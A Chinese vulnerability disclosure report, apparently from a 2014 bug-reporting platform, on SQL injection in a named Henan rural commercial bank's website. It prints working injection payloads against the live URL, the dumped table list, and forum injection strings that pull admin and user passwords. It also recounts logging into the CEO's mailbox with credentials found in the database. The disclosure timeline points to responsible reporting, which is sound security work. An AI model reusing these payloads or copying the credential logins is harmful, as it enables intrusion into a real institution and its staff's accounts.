漏洞详情

披露状态:

2014-09-16: 细节已通知厂商并且等待厂商处理中
2014-09-21: 厂商已经确认,细节仅向厂商公开
2014-10-01: 细节向核心白帽子及相关领域专家公开
2014-10-11: 细节向普通白帽子公开
2014-10-21: 细节向实习白帽子公开
2014-10-31: 细节向公众公开

简要描述:

某市农村商业银行存在SQL注射并导致敏感信息泄露

详细说明:

河南济源农村商业银行
地址:http://www.jynsh.com/
(1)sql注射

http://www.jynsh.com/show.php?id=22495&cid=238


参数:ID

qq1.gif

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=22495 AND 3998=3998&cid=238
Type: UNION query
Title: MySQL UNION query (NULL) - 23 columns
Payload: id=-4441 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a7976763a,0x4d4964514f6842494a70,0x3a6f6b743a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&cid=238
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=22495 AND SLEEP(5)&cid=238
---
web server operating system: Windows
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL >= 5.0.0
Database: jynshcom
[135 tables]
+---------------------------+
| adl_content |
| adl_modu_auth |
| article |
| articleclass |
| auth_role |
| chatmessage |
| chatsession |
| chatuserlist |
| counter |
| counter_authitem |
| counter_browsecap |
| counter_ipaddr |
| customer |
| dayduty |
| doc_qs |
| dutygroup |
| dv_active |
| dv_activeuser |
| dv_admin |
| dv_argue |
| dv_argue_topic |
| dv_banklog |
| dv_bankstatus |
| dv_bbs1 |
| dv_bbs_ft |
| dv_bbslink |
| dv_bbsnews |
| dv_besttopic |
| dv_board |
| dv_boardpermission |
| dv_bookmark |
| dv_chanorders |
| dv_friend |
| dv_fsettings |
| dv_gather_info |
| dv_gather_url |
| dv_group_bbs1 |
| dv_group_board |
| dv_group_name |
| dv_group_topic |
| dv_group_user |
| dv_groupname |
| dv_help |
| dv_honor_list |
| dv_honor_user |
| dv_log |
| dv_message |
| dv_moneylog |
| dv_note_info |
| dv_online |
| dv_plus |
| dv_plus_tools_buss |
| dv_plus_tools_info |
| dv_plus_tools_magicface |
| dv_querycache |
| dv_savvy_integral |
| dv_savvy_topic |
| dv_savvy_wealth |
| dv_setup |
| dv_smallpaper |
| dv_space_apply_today_star |
| dv_space_keyword |
| dv_space_post |
| dv_space_skins |
| dv_space_syscat |
| dv_space_system |
| dv_space_topic |
| dv_space_upfile |
| dv_space_user |
| dv_space_usercat |
| dv_space_usersave |
| dv_styles |
| dv_sysfiles |
| dv_sysupgrade |
| dv_tablelist |
| dv_topic |
| dv_topic_ft |
| dv_upfile |
| dv_user |
| dv_useraccess |
| dv_usergroups |
| dv_vote |
| dv_voteuser |
| email |
| file |
| flink_main |
| ipjilu |
| ipname |
| mailinfo |
| menu |
| menu_deleted |
| menu_role |
| message |
| modu |
| news_manage_modu_attach |
| news_manage_modu_auth |
| news_manage_modu_class |
| news_manage_modu_content |
| online_vod_modu_attach |
| online_vod_modu_auth |
| online_vod_modu_class |
| online_vod_modu_content |
| pop_modu_auth |
| pos_apply |
| pos_handle |
| pos_img |
| public_information |
| roles |
| skin |
| soft |
| softtype |
| tmp |
| tmp1 |
| tsjy_sl |
| tsjy_xx |
| user_dep |
| user_modu_auth |
| users |
| users_deleted |
| users_roles |
| users_type |
| vote_answer |
| vote_modu_auth |
| vote_question |
| xedk_exp_date |
| xedk_jtcy |
| xedk_sl |
| xedk_sq |
| xedk_user |
| xedk_xx |
| xedk_zh |
| xxgk |
| youqinglj |
| zhaopin_date |
| zhaopinxx |
+---------------------------+

<未进后台,比较奇葩获取到用户密码却登录不了有IP限制么?>
(2)不成功的论坛注射:

Copyright © 2000 – 2008 Dvbbs.PHP Powered By Dvbbs Version 2.0++ RC1

网上搜索了下存在sql注射.但是无法射出后台用户密码(事后在数据库表中dv_admin内容也是空的,为撒?)
(a)注射后台用户boardrule.php?groupboardid=1/**/union/**/select/**/concat(username,password)/**/from%20dv_admin%20where%20%20id%20=%201/**/
(b)注射前台用户boardrule.php?groupboardid=1/**/union/**/select/**/concat(username,userpassword)/**/from%20dv_user%20where%20%20userid%20=%201/**/

qq2.gif


(3)在数据库中MailInfo表泄漏了内部邮箱账户:

qq4.gif

qq3.gif

根据其提示的两个邮箱,测试登录(该处仅测试登录,作为一个小白,未查看内容!),作为CEO邮箱,内容算不上绝密机密,也比较敏感吧

qq5.gif

qq6.gif

qq7.gif


漏洞证明:

如上

修复方案:

标签: none

评论已关闭